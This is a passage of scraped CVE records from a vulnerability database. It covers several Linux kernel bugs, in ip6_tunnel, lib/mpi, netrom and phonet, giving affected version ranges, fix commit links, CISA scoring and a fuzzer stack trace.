"lessThan": "a9bc32879a08f23cdb80a48c738017e39aea1080",
"status": "affected",
"version": "0d3c703a9d1723c7707e0680019ac8ff5922db42",
"versionType": "git"
},
{
"lessThan": "af6b5c50d47ab43e5272ad61935d0ed2e264d3f0",
"status": "affected",
"version": "0d3c703a9d1723c7707e0680019ac8ff5922db42",
"versionType": "git"
},
{
"lessThan": "d54e4da98bbfa8c257bdca94c49652d81d18a4d8",
"status": "affected",
"version": "0d3c703a9d1723c7707e0680019ac8ff5922db42",
"versionType": "git"
},
{
"lessThan": "350a6640fac4b53564ec20aa3f4a0922cb0ba5e6",
"status": "affected",
"version": "0d3c703a9d1723c7707e0680019ac8ff5922db42",
"versionType": "git"
},
{
"lessThan": "c835df3bcc14858ae9b27315dd7de76370b94f3a",
"status": "affected",
"version": "0d3c703a9d1723c7707e0680019ac8ff5922db42",
"versionType": "git"
},
{
"lessThan": "8d975c15c0cd744000ca386247432d57b21f9df0",
"status": "affected",
"version": "0d3c703a9d1723c7707e0680019ac8ff5922db42",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv6/ip6_tunnel.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.7"
},
{
"lessThan": "4.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.77",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.16",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.77",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.16",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.4",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nip6_tunnel: make sure to pull inner header in __ip6_tnl_rcv()\n\nsyzbot found __ip6_tnl_rcv() could access unitiliazed data [1].\n\nCall pskb_inet_may_pull() to fix this, and initialize ipv6h\nvariable after this call as it can change skb-\u003ehead.\n\n[1]\n BUG: KMSAN: uninit-value in __INET_ECN_decapsulate include/net/inet_ecn.h:253 [inline]\n BUG: KMSAN: uninit-value in INET_ECN_decapsulate include/net/inet_ecn.h:275 [inline]\n BUG: KMSAN: uninit-value in IP6_ECN_decapsulate+0x7df/0x1e50 include/net/inet_ecn.h:321\n __INET_ECN_decapsulate include/net/inet_ecn.h:253 [inline]\n INET_ECN_decapsulate include/net/inet_ecn.h:275 [inline]\n IP6_ECN_decapsulate+0x7df/0x1e50 include/net/inet_ecn.h:321\n ip6ip6_dscp_ecn_decapsulate+0x178/0x1b0 net/ipv6/ip6_tunnel.c:727\n __ip6_tnl_rcv+0xd4e/0x1590 net/ipv6/ip6_tunnel.c:845\n ip6_tnl_rcv+0xce/0x100 net/ipv6/ip6_tunnel.c:888\n gre_rcv+0x143f/0x1870\n ip6_protocol_deliver_rcu+0xda6/0x2a60 net/ipv6/ip6_input.c:438\n ip6_input_finish net/ipv6/ip6_input.c:483 [inline]\n NF_HOOK include/linux/netfilter.h:314 [inline]\n ip6_input+0x15d/0x430 net/ipv6/ip6_input.c:492\n ip6_mc_input+0xa7e/0xc80 net/ipv6/ip6_input.c:586\n dst_input include/net/dst.h:461 [inline]\n ip6_rcv_finish+0x5db/0x870 net/ipv6/ip6_input.c:79\n NF_HOOK include/linux/netfilter.h:314 [inline]\n ipv6_rcv+0xda/0x390 net/ipv6/ip6_input.c:310\n __netif_receive_skb_one_core net/core/dev.c:5532 [inline]\n __netif_receive_skb+0x1a6/0x5a0 net/core/dev.c:5646\n netif_receive_skb_internal net/core/dev.c:5732 [inline]\n netif_receive_skb+0x58/0x660 net/core/dev.c:5791\n tun_rx_batched+0x3ee/0x980 drivers/net/tun.c:1555\n tun_get_user+0x53af/0x66d0 drivers/net/tun.c:2002\n tun_chr_write_iter+0x3af/0x5d0 drivers/net/tun.c:2048\n call_write_iter include/linux/fs.h:2084 [inline]\n new_sync_write fs/read_write.c:497 [inline]\n vfs_write+0x786/0x1200 fs/read_write.c:590\n ksys_write+0x20f/0x4c0 fs/read_write.c:643\n __do_sys_write fs/read_write.c:655 [inline]\n __se_sys_write fs/read_write.c:652 [inline]\n __x64_sys_write+0x93/0xd0 fs/read_write.c:652\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0x6d/0x140 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x63/0x6b\n\nUninit was created at:\n slab_post_alloc_hook+0x129/0xa70 mm/slab.h:768\n slab_alloc_node mm/slub.c:3478 [inline]\n kmem_cache_alloc_node+0x5e9/0xb10 mm/slub.c:3523\n kmalloc_reserve+0x13d/0x4a0 net/core/skbuff.c:560\n __alloc_skb+0x318/0x740 net/core/skbuff.c:651\n alloc_skb include/linux/skbuff.h:1286 [inline]\n alloc_skb_with_frags+0xc8/0xbd0 net/core/skbuff.c:6334\n sock_alloc_send_pskb+0xa80/0xbf0 net/core/sock.c:2787\n tun_alloc_skb drivers/net/tun.c:1531 [inline]\n tun_get_user+0x1e8a/0x66d0 drivers/net/tun.c:1846\n tun_chr_write_iter+0x3af/0x5d0 drivers/net/tun.c:2048\n call_write_iter include/linux/fs.h:2084 [inline]\n new_sync_write fs/read_write.c:497 [inline]\n vfs_write+0x786/0x1200 fs/read_write.c:590\n ksys_write+0x20f/0x4c0 fs/read_write.c:643\n __do_sys_write fs/read_write.c:655 [inline]\n __se_sys_write fs/read_write.c:652 [inline]\n __x64_sys_write+0x93/0xd0 fs/read_write.c:652\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0x6d/0x140 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x63/0x6b\n\nCPU: 0 PID: 5034 Comm: syz-executor331 Not tainted 6.7.0-syzkaller-00562-g9f8413c4a66f #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 11/17/2023"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:52:54.137Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/a9bc32879a08f23cdb80a48c738017e39aea1080"
},
{
"url": "https://git.kernel.org/stable/c/af6b5c50d47ab43e5272ad61935d0ed2e264d3f0"
},
{
"url": "https://git.kernel.org/stable/c/d54e4da98bbfa8c257bdca94c49652d81d18a4d8"
},
{
"url": "https://git.kernel.org/stable/c/350a6640fac4b53564ec20aa3f4a0922cb0ba5e6"
},
{
"url": "https://git.kernel.org/stable/c/c835df3bcc14858ae9b27315dd7de76370b94f3a"
},
{
"url": "https://git.kernel.org/stable/c/8d975c15c0cd744000ca386247432d57b21f9df0"
}
],
"title": "ip6_tunnel: make sure to pull inner header in __ip6_tnl_rcv()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26641",
"datePublished": "2024-03-18T10:19:07.581Z",
"dateReserved": "2024-02-19T14:20:24.137Z",
"dateUpdated": "2025-05-04T08:52:54.137Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52616 (GCVE-0-2023-52616)
Vulnerability from cvelistv5
Published
2024-03-18 10:14
Modified
2025-05-04 07:39
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
crypto: lib/mpi - Fix unexpected pointer access in mpi_ec_init
When the mpi_ec_ctx structure is initialized, some fields are not
cleared, causing a crash when referencing the field when the
structure was released. Initially, this issue was ignored because
memory for mpi_ec_ctx is allocated with the __GFP_ZERO flag.
For example, this error will be triggered when calculating the
Za value for SM2 separately.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: d58bb7e55a8a65894cc02f27c3e2bf9403e7c40f Version: d58bb7e55a8a65894cc02f27c3e2bf9403e7c40f Version: d58bb7e55a8a65894cc02f27c3e2bf9403e7c40f Version: d58bb7e55a8a65894cc02f27c3e2bf9403e7c40f Version: d58bb7e55a8a65894cc02f27c3e2bf9403e7c40f Version: d58bb7e55a8a65894cc02f27c3e2bf9403e7c40f |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:21.368Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0c3687822259a7628c85cd21a3445cbe3c367165"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2bb86817b33c9d704e127f92b838035a72c315b6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bb44477d4506e52785693a39f03cdc6a2c5e8598"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7ebf812b7019fd2d4d5a7ca45ef4bf3a6f4bda0a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7abdfd45a650c714d5ebab564bb1b988f14d9b49"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ba3c5574203034781ac4231acf117da917efcd2a"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52616",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:55:16.184973Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:19.775Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"lib/crypto/mpi/ec.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "0c3687822259a7628c85cd21a3445cbe3c367165",
"status": "affected",
"version": "d58bb7e55a8a65894cc02f27c3e2bf9403e7c40f",
"versionType": "git"
},
{
"lessThan": "2bb86817b33c9d704e127f92b838035a72c315b6",
"status": "affected",
"version": "d58bb7e55a8a65894cc02f27c3e2bf9403e7c40f",
"versionType": "git"
},
{
"lessThan": "bb44477d4506e52785693a39f03cdc6a2c5e8598",
"status": "affected",
"version": "d58bb7e55a8a65894cc02f27c3e2bf9403e7c40f",
"versionType": "git"
},
{
"lessThan": "7ebf812b7019fd2d4d5a7ca45ef4bf3a6f4bda0a",
"status": "affected",
"version": "d58bb7e55a8a65894cc02f27c3e2bf9403e7c40f",
"versionType": "git"
},
{
"lessThan": "7abdfd45a650c714d5ebab564bb1b988f14d9b49",
"status": "affected",
"version": "d58bb7e55a8a65894cc02f27c3e2bf9403e7c40f",
"versionType": "git"
},
{
"lessThan": "ba3c5574203034781ac4231acf117da917efcd2a",
"status": "affected",
"version": "d58bb7e55a8a65894cc02f27c3e2bf9403e7c40f",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"lib/crypto/mpi/ec.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.10"
},
{
"lessThan": "5.10",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.79",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.15",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.79",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.15",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.3",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: lib/mpi - Fix unexpected pointer access in mpi_ec_init\n\nWhen the mpi_ec_ctx structure is initialized, some fields are not\ncleared, causing a crash when referencing the field when the\nstructure was released. Initially, this issue was ignored because\nmemory for mpi_ec_ctx is allocated with the __GFP_ZERO flag.\nFor example, this error will be triggered when calculating the\nZa value for SM2 separately."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:39:57.258Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/0c3687822259a7628c85cd21a3445cbe3c367165"
},
{
"url": "https://git.kernel.org/stable/c/2bb86817b33c9d704e127f92b838035a72c315b6"
},
{
"url": "https://git.kernel.org/stable/c/bb44477d4506e52785693a39f03cdc6a2c5e8598"
},
{
"url": "https://git.kernel.org/stable/c/7ebf812b7019fd2d4d5a7ca45ef4bf3a6f4bda0a"
},
{
"url": "https://git.kernel.org/stable/c/7abdfd45a650c714d5ebab564bb1b988f14d9b49"
},
{
"url": "https://git.kernel.org/stable/c/ba3c5574203034781ac4231acf117da917efcd2a"
}
],
"title": "crypto: lib/mpi - Fix unexpected pointer access in mpi_ec_init",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52616",
"datePublished": "2024-03-18T10:14:46.066Z",
"dateReserved": "2024-03-06T09:52:12.089Z",
"dateUpdated": "2025-05-04T07:39:57.258Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27419 (GCVE-0-2024-27419)
Vulnerability from cvelistv5
Published
2024-05-17 12:01
Modified
2025-05-04 09:04
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netrom: Fix data-races around sysctl_net_busy_read
We need to protect the reader reading the sysctl value because the
value can be changed concurrently.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27419",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-20T14:13:24.653763Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:46:48.428Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:34:52.300Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d623fd5298d95b65d27ef5a618ebf39541074856"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f9055fa2b2931261d5f89948ee5bc315b6a22d4a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bbf950a6e96a91cf8cf0c71117b94ed3fafc9dd3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0866afaff19d8460308b022345ed116a12b1d0e1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/43464808669ba9d23996f0b6d875450191687caf"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/34cab94f7473e7b09f5205d4583fb5096cb63b5b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/16d71319e29d5825ab53f263b59fdd8dc2d60ad4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d380ce70058a4ccddc3e5f5c2063165dc07672c6"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netrom/af_netrom.c",
"net/netrom/nr_in.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d623fd5298d95b65d27ef5a618ebf39541074856",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "f9055fa2b2931261d5f89948ee5bc315b6a22d4a",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "bbf950a6e96a91cf8cf0c71117b94ed3fafc9dd3",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "0866afaff19d8460308b022345ed116a12b1d0e1",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "43464808669ba9d23996f0b6d875450191687caf",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "34cab94f7473e7b09f5205d4583fb5096cb63b5b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "16d71319e29d5825ab53f263b59fdd8dc2d60ad4",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d380ce70058a4ccddc3e5f5c2063165dc07672c6",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netrom/af_netrom.c",
"net/netrom/nr_in.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.12"
},
{
"lessThan": "2.6.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.310",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.272",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.213",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.152",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.82",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.22",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.310",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.272",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.213",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.152",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.82",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.22",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.10",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "2.6.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetrom: Fix data-races around sysctl_net_busy_read\n\nWe need to protect the reader reading the sysctl value because the\nvalue can be changed concurrently."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:04:45.518Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d623fd5298d95b65d27ef5a618ebf39541074856"
},
{
"url": "https://git.kernel.org/stable/c/f9055fa2b2931261d5f89948ee5bc315b6a22d4a"
},
{
"url": "https://git.kernel.org/stable/c/bbf950a6e96a91cf8cf0c71117b94ed3fafc9dd3"
},
{
"url": "https://git.kernel.org/stable/c/0866afaff19d8460308b022345ed116a12b1d0e1"
},
{
"url": "https://git.kernel.org/stable/c/43464808669ba9d23996f0b6d875450191687caf"
},
{
"url": "https://git.kernel.org/stable/c/34cab94f7473e7b09f5205d4583fb5096cb63b5b"
},
{
"url": "https://git.kernel.org/stable/c/16d71319e29d5825ab53f263b59fdd8dc2d60ad4"
},
{
"url": "https://git.kernel.org/stable/c/d380ce70058a4ccddc3e5f5c2063165dc07672c6"
}
],
"title": "netrom: Fix data-races around sysctl_net_busy_read",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27419",
"datePublished": "2024-05-17T12:01:27.871Z",
"dateReserved": "2024-02-25T13:47:42.683Z",
"dateUpdated": "2025-05-04T09:04:45.518Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36946 (GCVE-0-2024-36946)
Vulnerability from cvelistv5
Published
2024-05-30 15:35
Modified
2025-05-04 09:12
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
phonet: fix rtm_phonet_notify() skb allocation
fill_route() stores three components in the skb:
- struct rtmsg
- RTA_DST (u8)
- RTA_OIF (u32)
Therefore, rtm_phonet_notify() should use
NLMSG_ALIGN(sizeof(struct rtmsg)) +
nla_total_size(1) +
nla_total_size(4)
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: f062f41d06575744b9eaf725eef8a5d3b5f5b7ca Version: f062f41d06575744b9eaf725eef8a5d3b5f5b7ca Version: f062f41d06575744b9eaf725eef8a5d3b5f5b7ca Version: f062f41d06575744b9eaf725eef8a5d3b5f5b7ca Version: f062f41d06575744b9eaf725eef8a5d3b5f5b7ca Version: f062f41d06575744b9eaf725eef8a5d3b5f5b7ca Version: f062f41d06575744b9eaf725eef8a5d3b5f5b7ca Version: f062f41d06575744b9eaf725eef8a5d3b5f5b7ca |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-10-04T15:02:48.811Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ec1f71c05caeba0f814df77e0f511d8b4618623a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dc6beac059f0331de97155a89d84058d4a9e49c7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f085e02f0a32f6dfcfabc6535c9c4a1707cef86b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4ff334cade9dae50e4be387f71e94fae634aa9b4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/728a83160f98ee6b60df0d890141b9b7240182fe"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ee9e39a6cb3ca2a3d35b4ae25547ee3526a44d00"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9a77226440008cf04ba68faf641a2d50f4998137"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d8cac8568618dcb8a51af3db1103e8d4cc4aeea7"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20241004-0002/"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-36946",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T17:15:45.186553Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
